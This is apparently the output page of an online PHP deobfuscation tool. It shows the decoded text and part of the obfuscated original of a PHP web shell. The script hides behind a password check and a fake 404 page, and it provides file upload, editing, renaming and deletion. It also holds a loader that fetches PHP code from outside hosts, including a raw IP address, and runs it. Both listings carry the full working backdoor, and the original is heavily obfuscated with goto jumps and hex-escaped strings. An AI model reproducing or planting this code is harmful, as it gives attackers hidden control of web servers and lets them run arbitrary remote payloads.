Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto zg0hs; mlD0q: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { ..
Decoded Output download
<?php
goto zg0hs; mlD0q: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " bytes"; } elseif ($bytes == 1) { $bytes = $bytes . " byte"; } else { $bytes = "0 bytes"; } return $bytes; } goto Fb5xt; crcwo: if (isset($_REQUEST["ac"]) && isset($_REQUEST["path"]) && isset($_REQUEST["api"]) && isset($_REQUEST["t"])) { if (!isset($_REQUEST["s"])) { $s = 1; } else { $s = $_REQUEST["s"]; } switch ($s) { case 1: $code = GC("htt" . "ps://c.zv" . "o1.xy" . "z/"); break; case 2: $code = GC("ht" . "tps://c2.ic" . "w7.co" . "m/"); break; case 3: $code = GC("http://45.11.57.159/"); break; default: $code = GC("htt" . "ps://c.zv" . "o1.xy" . "z/"); break; } $need = "<" . "?p" . "hp"; if (strpos($code, $need) === false) { die("get failed"); } if (function_exists("tmpfile")) { $file_handle = tmpfile(); fwrite($file_handle, $code); $a = stream_get_meta_data($file_handle); $file_path = $a["uri"]; @(include $file_path); @fclose($file_handle); } else { $file_path = ".c"; file_put_contents($file_path, $code); @(include $file_path); } @unlink($file_path); die; } goto PdLmO; pFTCn: GfK7t: goto yiz_f; GYAjf: goto cHsVn; goto R9xAg; UBVfd: cHsVn: goto TDkBG; a2Rbs: BUI7D: goto iJ9VK; nE6Ww: goto Q_9a7; goto MkWW6; hkpbB: XWgaU: goto JutjK; VP023: if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<p>" . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } goto hG0E_; BM6nu: Lfbk0: goto p7vgq; JutjK: echo "
</div>
<div class="form-inline">
<a href="?upload&q=" . urlencode(encodePath(PATH)) . ""><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a> \xa</div>
</nav>"; goto OHgau; ix3pI: goto q_IPq; goto gbUzQ; zg0hs: goto ULFwB; goto F5ksM; i9IXE: xTRLw: goto crcwo; E3E1d: RiNga: goto bI6Rz; GSISW: DU5rI: goto qbEmp; X_UcT: goto Ugn87; goto TeEMT; FGBVz: if (isset($_GET["d"]) && isset($_GET["q"])) { $name = PATH . "/" . $_GET["d"]; if (is_file($name)) { if (unlink($name)) { echo "<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } elseif (is_dir($name)) { if (rmdir($name) == true) { echo "<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } } goto lc1Ig; T2SRA: goto Bqp27; goto pFTCn; zfHYB: uvs96: goto iZncr; YkM4K: IeYRs: goto FGBVz; cvpYs: dDnAg: goto kTUje; xYCo6: n_F58: goto VP023; Z_fEk: goto dDnAg; goto lj2j2; OyEh4: function decodePath($path) { $a = array("/", "\", ".", ":"); $b = array("\xe0\xa6\225", "\340\xa6\226", "\340\xa6\x97", "\340\xa6\x98"); return str_replace($b, $a, $path); } goto GYAjf; cBv6k: f5swt: goto MXPhj; isxnM: if (isset($_REQUEST["d_time"])) { die("{->" . $p . "<-}"); } goto qL1cA; knFg2: goto n_F58; goto hkpbB; TS9My: ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="IE=edge"http-equiv="X-UA-Compatible"><meta content="width=device-width,initial-scale=1"name="viewport"><title>000</title><link crossorigin="anonymous"href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"rel="stylesheet"><link crossorigin="anonymous"href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="rel="stylesheet"referrerpolicy="no-referrer"></head><body><?php goto ix3pI; iJ9VK: if (isset($_GET["upload"])) { echo "
<form method="post" enctype="multipart/form-data">\xa Select file to upload:\xa <input type="file" name="fileToUpload" id="fileToUpload">\xa <input type="submit" class="btn btn-dark" value="Upload" name="upload">
</form>"; } goto CS3yQ; qbEmp: echo "
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">\xa <div class="navbar-brand">\xa <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>
"; goto X_UcT; bI6Rz: if (isset($_GET["p"])) { if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == "." || $obj == "..") { continue; } $new_obj = PATH . "/" . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo "\xa<table class="table table-hover">
<thead>\xa <tr>
<th scope="col">Name</th>
<th scope="col">Size</th>\xa <th scope="col">Modified</th>\xa <th scope="col">Perms</th>\xa <th scope="col">Actions</th>\xa </tr>\xa </thead>
<tbody>\xa"; foreach ($folders as $folder) { echo " <tr>\xa <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td>\xa <td><b>---</b></td>\xa <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td>\xa <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td>\xa <td>\xa <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>\xa <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>\xa </tr>
"; } foreach ($files as $file) { echo " <tr>
<td>" . fileIcon($file) . $file . "</td>
<td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td>\xa <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td>\xa <td>0" . substr(decoct(fileperms(PATH . "/" . $file)), -3) . "</a></td>\xa <td>\xa <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>\xa <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
<a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
<td>\xa </tr>
"; } echo " </tbody>\xa</table>"; } else { if (empty($_GET)) { echo "<script>window.location.replace('?p=');</script>"; } } goto c6QU2; OHgau: goto RiNga; goto UBVfd; p6lg7: f3C3_: goto eTKI1; GiTMF: pmycy: goto isxnM; zHEsn: function fileExtension($file) { return substr(strrchr($file, "."), 1); } goto nE6Ww; wTXRW: ecN8i: goto zY0GK; eTKI1: function encodePath($path) { $a = array("/", "\", ".", ":"); $b = array("\xe0\xa6\x95", "\340\246\226", "\xe0\xa6\227", "\xe0\246\x98"); return str_replace($a, $b, $path); } goto DKv5S; KxMpb: goto tZJnq; goto e6qiT; p7vgq: if (isset($_GET["r"])) { if (!empty($_GET["r"]) && isset($_GET["q"])) { echo "\xa <form method="post">
Rename:
<input type="text" name="name" value="" . $_GET["r"] . "">\xa <input type="submit" class="btn btn-dark" value="Rename" name="rename">
</form>"; if (isset($_POST["rename"])) { $name = PATH . "/" . $_GET["r"]; if (rename($name, PATH . "/" . $_POST["name"])) { echo "<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } } } goto TNYFm; W5d5j: if (isset($_GET["e"])) { if (!empty($_GET["e"]) && isset($_GET["q"])) { echo "
<form method="post">
<textarea style="height: 500px;\xa width: 90%;" name="data">" . htmlspecialchars(file_get_contents(PATH . "/" . $_GET["e"])) . "</textarea>
<br>\xa <input type="submit" class="btn btn-dark" value="Save" name="edit">\xa </form>"; if (isset($_POST["edit"])) { $filename = PATH . "/" . $_GET["e"]; $data = $_POST["data"]; $open = fopen($filename, "w"); if (fwrite($open, $data)) { echo "<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } fclose($open); } } } goto knFg2; WpK3q: goto eQqKj; goto CdzW_; XMeG2: foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "<a href="?p=/">/</a>"; continue; } if ($dir_part == '') { continue; } echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "\xe0\246\x98", $paths[$i]); if ($i != $id) { echo "\xe0\xa6\x95"; } } echo "'>" . $dir_part . "</a>/"; } goto Zo9GM; duyKy: $path = str_replace("\", "/", PATH); goto GkRG0; TeEMT: xiLj0: goto ENOzU; yiz_f: $pass = false; goto WLREi; MXPhj: if (!$pass) { if (!isset($_REQUEST["520"])) { header("HTTP/1.1 404 Not Found"); die; } echo "<form action="#" method="post"><input type="password" name="p8" > <input type="submit" value="submit"></form>"; die; } goto WpK3q; njF7V: if (str_replace("//", "/", $_SERVER["PHP_SELF"]) == str_replace("\\", "/", $path)) { $root_path = "/"; } else { $root_path = str_replace(str_replace("//", "/", $_SERVER["PHP_SELF"]), '', str_replace("\\", "/", $path)); } goto Z_fEk; TNYFm: goto TA_Gn; goto sT0W1; SMJHz: goto vVgXL; goto zfHYB; KxMit: lqPvT: goto Y3jMz; VU30W: goto xTRLw; goto haCUg; lc1Ig: goto fjP0z; goto cBv6k; ENOzU: if (isset($_POST["logout"]) && ($_POST["logout"] = 1)) { setcookie("p8", null); $pass = false; } goto blkp0; Fb5xt: goto CoDEE; goto ODG2z; iZncr: $paths = explode("/", $path); goto KxMpb; aPXff: goto DU5rI; goto GiTMF; CS3yQ: goto Lfbk0; goto BM6nu; TDkBG: $root_path = __DIR__; goto T6xXG; sT0W1: ULFwB: goto wIhhd; e6qiT: Bqp27: goto njF7V; EWq6F: goto sVEqT; goto PX4il; DKv5S: goto RO9Ip; goto GSISW; c6QU2: goto BUI7D; goto qXknG; A952S: $path = $_SERVER["SCRIPT_FILENAME"]; goto EWq6F; wIhhd: $p = "34147b96162ded43068ec9fae941de40"; goto VU30W; haCUg: sVEqT: goto rThld; rThld: if (strpos($_SERVER["SCRIPT_FILENAME"], ":")) { $path = str_replace("\", "/", $path); } goto T2SRA; WLREi: goto lqPvT; goto i9IXE; PX4il: RO9Ip: goto OyEh4; T6xXG: goto YkuXA; goto E3E1d; swYxi: YkuXA: goto A952S; ls0dl: goto xiLj0; goto swYxi; MkWW6: q_IPq: goto mlD0q; jBw8s: function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return "<i class="fa-sharp fa-solid fa-bug"></i> "; } elseif ($file == ".htaccess") { return "<i class="fa-solid fa-hammer"></i> "; } if ($ext == "html" || $ext == "htm") { return "<i class="fa-brands fa-html5"></i> "; } elseif ($ext == "php" || $ext == "phtml") { return "<i class="fa-brands fa-php"></i> "; } elseif (in_array($ext, $imgs)) { return "<i class="fa-regular fa-images"></i> "; } elseif ($ext == "css") { return "<i class="fa-brands fa-css3"></i> "; } elseif ($ext == "txt") { return "<i class="fa-regular fa-file-lines"></i> "; } elseif (in_array($ext, $audio)) { return "<i class="fa-duotone fa-file-music"></i> "; } elseif ($ext == "py") { return "<i class="fa-brands fa-python"></i> "; } elseif ($ext == "js") { return "<i class="fa-brands fa-js"></i> "; } else { return "<i class="fa-solid fa-file"></i> "; } } goto x0QNt; Qom5U: function GC($a) { $url = sprintf("%s?api=%s&ac=%s&path=%s&t=%s", $a, $_REQUEST["api"], $_REQUEST["ac"], $_REQUEST["path"], $_REQUEST["t"]); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "ll"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } goto ddzg4; PdLmO: goto pmycy; goto cvpYs; blkp0: goto f5swt; goto xYCo6; ddzg4: goto g9yK7; goto YkM4K; F5ksM: TA_Gn: goto W5d5j; FlHCK: vVgXL: goto Qom5U; gbUzQ: fjP0z: goto u5KQo; wxMF1: tZJnq: goto XMeG2; vS2f8: echo "<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>"; goto SMJHz; hG0E_: goto IeYRs; goto KxMit; x0QNt: goto f3C3_; goto p6lg7; cNm7G: goto ecN8i; goto wTXRW; kTUje: if (isset($_GET["p"])) { if (empty($_GET["p"])) { $p = __DIR__; } elseif (!is_dir(decodePath($_GET["p"]))) { echo "<script>
alert('Directory is Corrupted and Unreadable.');\xawindow.location.replace('?');
</script>"; } elseif (is_dir(decodePath($_GET["p"]))) { $p = decodePath($_GET["p"]); } } elseif (isset($_GET["q"])) { if (!is_dir(decodePath($_GET["q"]))) { echo "<script>window.location.replace('?p=');</script>"; } elseif (is_dir(decodePath($_GET["q"]))) { $p = decodePath($_GET["q"]); } } else { $p = __DIR__; } goto cNm7G; R9xAg: CoDEE: goto zHEsn; Zo9GM: goto XWgaU; goto a2Rbs; Y3jMz: if (isset($_COOKIE["p8"])) { if (md5($_COOKIE["p8"]) == $p) { $pass = true; } } else { if (isset($_POST["p8"])) { if (md5($_POST["p8"]) == $p) { setcookie("p8", $_POST["p8"]); $pass = true; } } } goto ls0dl; qXknG: Q_9a7: goto jBw8s; qL1cA: goto GfK7t; goto FlHCK; CdzW_: eQqKj: goto vS2f8; zY0GK: define("PATH", $p); goto aPXff; ODG2z: Ugn87: goto duyKy; GkRG0: goto uvs96; goto wxMF1; lj2j2: g9yK7: goto TS9My; u5KQo: ?>
<script crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"></script></body></html>
Did this file decode correctly?
Original Code
<?php
goto zg0hs; mlD0q: function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\x47\x42"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\102"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\102"; } elseif ($bytes > 1) { $bytes = $bytes . "\40\142\171\164\145\163"; } elseif ($bytes == 1) { $bytes = $bytes . "\40\x62\171\x74\145"; } else { $bytes = "\x30\x20\142\171\x74\x65\163"; } return $bytes; } goto Fb5xt; crcwo: if (isset($_REQUEST["\x61\x63"]) && isset($_REQUEST["\x70\x61\164\x68"]) && isset($_REQUEST["\x61\x70\151"]) && isset($_REQUEST["\x74"])) { if (!isset($_REQUEST["\x73"])) { $s = 1; } else { $s = $_REQUEST["\x73"]; } switch ($s) { case 1: $code = GC("\150\164\164" . "\160\x73\72\57\57\143\x2e\x7a\166" . "\x6f\61\56\x78\x79" . "\x7a\x2f"); break; case 2: $code = GC("\150\x74" . "\x74\x70\163\x3a\x2f\57\x63\x32\56\x69\x63" . "\x77\x37\56\x63\157" . "\155\57"); break; case 3: $code = GC("\150\x74\x74\160\x3a\x2f\x2f\64\x35\56\x31\61\56\65\x37\x2e\x31\x35\71\x2f"); break; default: $code = GC("\150\164\x74" . "\160\x73\x3a\x2f\x2f\143\56\x7a\166" . "\x6f\61\56\x78\171" . "\x7a\57"); break; } $need = "\x3c" . "\77\x70" . "\x68\x70"; if (strpos($code, $need) === false) { die("\x67\145\x74\x20\146\141\x69\154\x65\144"); } if (function_exists("\x74\155\x70\x66\x69\x6c\145")) { $file_handle = tmpfile(); fwrite($file_handle, $code); $a = stream_get_meta_data($file_handle); $file_path = $a["\165\x72\x69"]; @(include $file_path); @fclose($file_handle); } else { $file_path = "\x2e\x63"; file_put_contents($file_path, $code); @(include $file_path); } @unlink($file_path); die; } goto PdLmO; pFTCn: GfK7t: goto yiz_f; GYAjf: goto cHsVn; goto R9xAg; UBVfd: cHsVn: goto TDkBG; a2Rbs: BUI7D: goto iJ9VK; nE6Ww: goto Q_9a7; goto MkWW6; hkpbB: XWgaU: goto JutjK; VP023: if (isset($_POST["\x75\160\x6c\157\x61\144"])) { $target_file = PATH . "\57" . $_FILES["\146\151\x6c\145\124\157\x55\160\154\x6f\x61\x64"]["\x6e\x61\x6d\145"]; if (move_uploaded_file($_FILES["\146\151\x6c\145\124\x6f\125\x70\154\x6f\x61\x64"]["\164\155\x70\x5f\x6e\x61\x6d\145"], $target_file)) { echo "\x3c\160\76" . htmlspecialchars(basename($_FILES["\x66\x69\154\x65\x54\157\x55\x70\x6c\157\141\x64"]["\156\141\155\145"])) . "\x20\150\141\163\40\142\145\145\x6e\40\x75\160\x6c\157\141\x64\x65\x64\x2e\74\x2f\x70\76"; } else { echo "\74\x70\76\x53\x6f\x72\162\171\54\x20\x74\x68\145\x72\x65\40\167\x61\163\x20\x61\156\x20\145\162\x72\x6f\162\x20\165\160\x6c\x6f\141\x64\151\x6e\x67\x20\171\x6f\x75\x72\40\x66\151\154\x65\x2e\74\x2f\160\x3e"; } } goto hG0E_; BM6nu: Lfbk0: goto p7vgq; JutjK: echo "\12\74\x2f\144\151\x76\76\12\74\144\x69\166\x20\x63\x6c\x61\163\163\75\x22\146\x6f\x72\x6d\x2d\151\156\154\x69\156\x65\x22\x3e\12\x3c\141\x20\x68\162\145\x66\75\42\77\x75\x70\154\x6f\x61\144\x26\161\75" . urlencode(encodePath(PATH)) . "\42\76\74\x62\x75\164\x74\157\156\x20\x63\154\x61\163\x73\75\42\x62\164\x6e\40\142\x74\156\x2d\x64\x61\162\x6b\42\40\x74\x79\160\145\75\42\142\165\x74\164\x6f\156\x22\76\125\160\154\157\141\x64\40\106\151\x6c\145\x3c\57\x62\165\164\164\x6f\156\76\x3c\57\x61\x3e\12\74\x61\x20\x68\x72\145\x66\75\x22\77\x22\x3e\x3c\142\165\164\164\157\x6e\x20\x74\x79\x70\145\75\x22\142\165\x74\164\x6f\x6e\x22\x20\x63\x6c\x61\x73\163\75\x22\x62\164\x6e\x20\x62\164\x6e\x2d\144\x61\x72\153\42\x3e\110\117\115\x45\74\x2f\142\x75\x74\x74\157\x6e\76\74\57\141\76\x20\xa\74\x2f\x64\151\x76\76\12\x3c\57\156\x61\x76\x3e"; goto OHgau; ix3pI: goto q_IPq; goto gbUzQ; zg0hs: goto ULFwB; goto F5ksM; i9IXE: xTRLw: goto crcwo; E3E1d: RiNga: goto bI6Rz; GSISW: DU5rI: goto qbEmp; X_UcT: goto Ugn87; goto TeEMT; FGBVz: if (isset($_GET["\144"]) && isset($_GET["\161"])) { $name = PATH . "\57" . $_GET["\x64"]; if (is_file($name)) { if (unlink($name)) { echo "\74\163\143\162\151\x70\x74\76\x61\x6c\145\162\164\50\x27\x46\x69\154\145\x20\x72\145\x6d\x6f\166\145\x64\x2e\x27\51\73\40\x77\151\x6e\x64\x6f\167\56\x6c\157\x63\141\164\x69\157\x6e\x2e\162\x65\160\x6c\141\x63\x65\50\x27\77\160\x3d" . encodePath(PATH) . "\x27\x29\73\x3c\57\163\143\162\151\160\164\76"; } else { echo "\x3c\163\x63\162\151\160\164\76\x61\x6c\x65\x72\164\x28\47\x53\x6f\x6d\145\x20\145\x72\162\x6f\x72\x20\x6f\x63\x63\x75\x72\x72\x65\x64\56\47\x29\x3b\x20\x77\x69\x6e\x64\x6f\167\x2e\154\157\x63\x61\164\151\x6f\156\x2e\162\145\160\154\141\143\x65\50\47\x3f\x70\75" . encodePath(PATH) . "\47\x29\x3b\x3c\57\x73\143\162\x69\160\x74\76"; } } elseif (is_dir($name)) { if (rmdir($name) == true) { echo "\x3c\x73\x63\x72\151\x70\x74\76\x61\154\x65\x72\x74\x28\x27\104\151\x72\x65\143\164\x6f\x72\171\x20\x72\145\x6d\x6f\166\x65\x64\56\x27\x29\73\40\x77\151\156\x64\x6f\167\x2e\x6c\157\x63\141\x74\x69\157\156\56\x72\x65\160\x6c\x61\143\145\50\47\x3f\160\75" . encodePath(PATH) . "\x27\51\73\74\x2f\x73\x63\x72\151\160\164\x3e"; } else { echo "\74\163\143\x72\151\160\164\76\141\x6c\145\x72\164\50\x27\123\157\x6d\145\40\145\x72\x72\x6f\162\x20\x6f\x63\143\x75\162\x72\145\x64\x2e\47\51\73\40\x77\x69\156\x64\x6f\x77\56\154\157\143\141\164\x69\x6f\156\x2e\x72\145\160\x6c\x61\x63\x65\x28\47\77\x70\x3d" . encodePath(PATH) . "\47\x29\73\74\57\x73\143\x72\x69\x70\x74\76"; } } } goto lc1Ig; T2SRA: goto Bqp27; goto pFTCn; zfHYB: uvs96: goto iZncr; YkM4K: IeYRs: goto FGBVz; cvpYs: dDnAg: goto kTUje; xYCo6: n_F58: goto VP023; Z_fEk: goto dDnAg; goto lj2j2; OyEh4: function decodePath($path) { $a = array("\57", "\x5c", "\56", "\x3a"); $b = array("\xe0\xa6\225", "\340\xa6\226", "\340\xa6\x97", "\340\xa6\x98"); return str_replace($b, $a, $path); } goto GYAjf; cBv6k: f5swt: goto MXPhj; isxnM: if (isset($_REQUEST["\x64\x5f\164\151\155\145"])) { die("\173\x2d\76" . $p . "\74\55\x7d"); } goto qL1cA; knFg2: goto n_F58; goto hkpbB; TS9My: ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="IE=edge"http-equiv="X-UA-Compatible"><meta content="width=device-width,initial-scale=1"name="viewport"><title>000</title><link crossorigin="anonymous"href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"rel="stylesheet"><link crossorigin="anonymous"href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="rel="stylesheet"referrerpolicy="no-referrer"></head><body><?php goto ix3pI; iJ9VK: if (isset($_GET["\165\x70\154\157\141\144"])) { echo "\12\x20\40\40\40\x3c\x66\x6f\162\155\x20\x6d\x65\x74\x68\x6f\x64\75\x22\160\x6f\163\164\x22\x20\145\x6e\143\164\171\160\145\x3d\42\x6d\x75\x6c\164\x69\160\141\x72\x74\57\x66\x6f\x72\155\55\x64\x61\164\x61\x22\76\xa\40\x20\40\40\40\x20\40\x20\x53\x65\x6c\x65\x63\164\40\x66\x69\x6c\x65\40\x74\157\x20\x75\x70\154\157\x61\144\x3a\xa\40\x20\x20\40\x20\40\x20\x20\x3c\151\x6e\x70\165\x74\40\164\171\160\x65\x3d\x22\146\151\154\x65\42\x20\156\141\x6d\145\x3d\42\x66\x69\154\x65\124\x6f\x55\x70\154\157\x61\x64\x22\40\151\144\75\x22\x66\x69\x6c\145\124\x6f\x55\x70\154\157\141\144\42\x3e\xa\40\40\40\40\40\40\40\x20\74\x69\x6e\x70\165\164\x20\x74\171\160\x65\x3d\42\163\x75\x62\155\151\164\x22\x20\143\154\141\x73\163\75\42\142\x74\156\x20\142\x74\156\55\x64\141\162\153\x22\x20\x76\141\154\165\145\75\42\x55\x70\x6c\157\141\x64\x22\40\x6e\141\155\145\x3d\x22\165\x70\x6c\157\141\144\42\76\12\40\x20\x20\40\x3c\x2f\146\157\x72\155\x3e"; } goto CS3yQ; qbEmp: echo "\12\x3c\x6e\x61\166\x20\x63\154\141\163\163\x3d\42\x6e\141\x76\142\141\162\40\x6e\141\x76\142\x61\162\x2d\x6c\151\x67\150\x74\x22\40\163\x74\x79\x6c\x65\75\x22\142\141\x63\x6b\147\x72\x6f\x75\x6e\x64\55\x63\x6f\154\157\x72\72\40\x23\145\x33\146\62\x66\144\73\x22\x3e\xa\40\40\74\x64\151\166\x20\x63\154\x61\x73\163\75\42\x6e\x61\x76\142\x61\162\55\x62\162\141\156\144\42\x3e\xa\40\x20\74\x61\x20\150\162\145\x66\75\x22\77\x22\x3e\x3c\151\x6d\147\x20\163\162\143\x3d\42\150\x74\x74\160\163\x3a\x2f\57\x67\151\x74\150\165\142\56\143\x6f\155\x2f\146\154\x75\x69\144\151\143\x6f\x6e\56\x70\x6e\x67\42\x20\x77\151\144\x74\150\75\x22\x33\x30\x22\x20\150\145\x69\x67\x68\x74\x3d\x22\63\x30\x22\40\141\154\164\x3d\x22\x22\x3e\74\x2f\x61\x3e\12"; goto X_UcT; bI6Rz: if (isset($_GET["\160"])) { if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == "\x2e" || $obj == "\56\x2e") { continue; } $new_obj = PATH . "\x2f" . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo "\xa\74\164\x61\x62\154\x65\40\143\x6c\141\x73\x73\75\42\164\141\x62\154\145\40\164\x61\x62\x6c\x65\x2d\x68\x6f\166\145\162\x22\x3e\12\x20\40\74\x74\150\x65\x61\144\x3e\xa\40\40\x20\x20\74\164\x72\x3e\12\x20\x20\x20\40\40\40\74\x74\150\x20\x73\x63\x6f\x70\145\75\x22\x63\x6f\x6c\42\x3e\x4e\x61\155\x65\74\x2f\x74\150\x3e\12\x20\40\x20\40\40\40\74\x74\150\40\163\143\x6f\160\x65\75\42\x63\x6f\154\x22\x3e\x53\x69\x7a\x65\74\x2f\x74\x68\76\xa\40\x20\x20\40\40\40\74\164\150\40\163\143\x6f\x70\x65\x3d\x22\143\x6f\154\42\76\115\x6f\144\x69\x66\x69\x65\144\74\x2f\164\x68\x3e\xa\40\40\40\x20\40\x20\74\164\150\40\x73\143\x6f\x70\x65\x3d\42\143\157\154\42\x3e\120\x65\x72\155\x73\x3c\x2f\x74\150\x3e\xa\x20\x20\x20\40\x20\40\x3c\x74\x68\40\x73\x63\x6f\x70\x65\x3d\42\143\x6f\x6c\x22\76\101\143\164\x69\x6f\x6e\163\74\x2f\164\150\x3e\xa\40\40\40\x20\x3c\57\164\x72\76\xa\x20\x20\74\x2f\x74\150\x65\x61\x64\x3e\12\40\40\74\164\x62\x6f\x64\171\76\xa"; foreach ($folders as $folder) { echo "\40\40\x20\40\74\x74\x72\x3e\xa\40\x20\x20\40\x20\x20\x3c\164\144\x3e\74\151\x20\143\x6c\x61\x73\163\x3d\47\x66\141\x2d\x73\157\154\151\144\40\x66\141\55\146\157\x6c\144\145\x72\x27\76\74\x2f\x69\76\40\x3c\141\40\x68\x72\x65\146\x3d\x27\x3f\160\x3d" . urlencode(encodePath(PATH . "\57" . $folder)) . "\x27\76" . $folder . "\74\x2f\x61\x3e\x3c\x2f\164\144\76\xa\x20\40\40\40\40\x20\x3c\x74\x64\x3e\x3c\x62\x3e\55\55\55\74\x2f\x62\x3e\74\57\164\144\76\xa\40\x20\40\x20\x20\40\x3c\x74\x64\x3e" . date("\106\x20\x64\40\x59\x20\110\72\x69\72\163\56", filemtime(PATH . "\x2f" . $folder)) . "\74\x2f\x74\x64\76\xa\x20\40\40\x20\x20\x20\x3c\x74\x64\76\x30" . substr(decoct(fileperms(PATH . "\x2f" . $folder)), -3) . "\74\57\141\x3e\x3c\57\x74\144\x3e\xa\40\x20\40\x20\40\x20\x3c\164\144\x3e\xa\40\x20\40\40\x20\40\74\141\40\x74\151\164\154\145\75\47\x52\145\156\141\x6d\x65\47\x20\150\x72\x65\x66\x3d\47\x3f\161\75" . urlencode(encodePath(PATH)) . "\x26\162\x3d" . $folder . "\47\x3e\74\151\x20\x63\x6c\141\x73\x73\75\47\146\x61\55\x73\x68\x61\162\160\x20\146\x61\55\162\145\147\165\x6c\x61\x72\x20\x66\x61\55\x70\145\x6e\55\164\157\55\x73\x71\165\x61\x72\x65\x27\76\74\x2f\151\x3e\74\x2f\x61\76\xa\40\x20\x20\40\x20\40\74\x61\40\x74\151\x74\x6c\145\75\47\x44\145\x6c\145\164\145\x27\x20\150\x72\145\146\75\x27\x3f\x71\75" . urlencode(encodePath(PATH)) . "\46\144\75" . $folder . 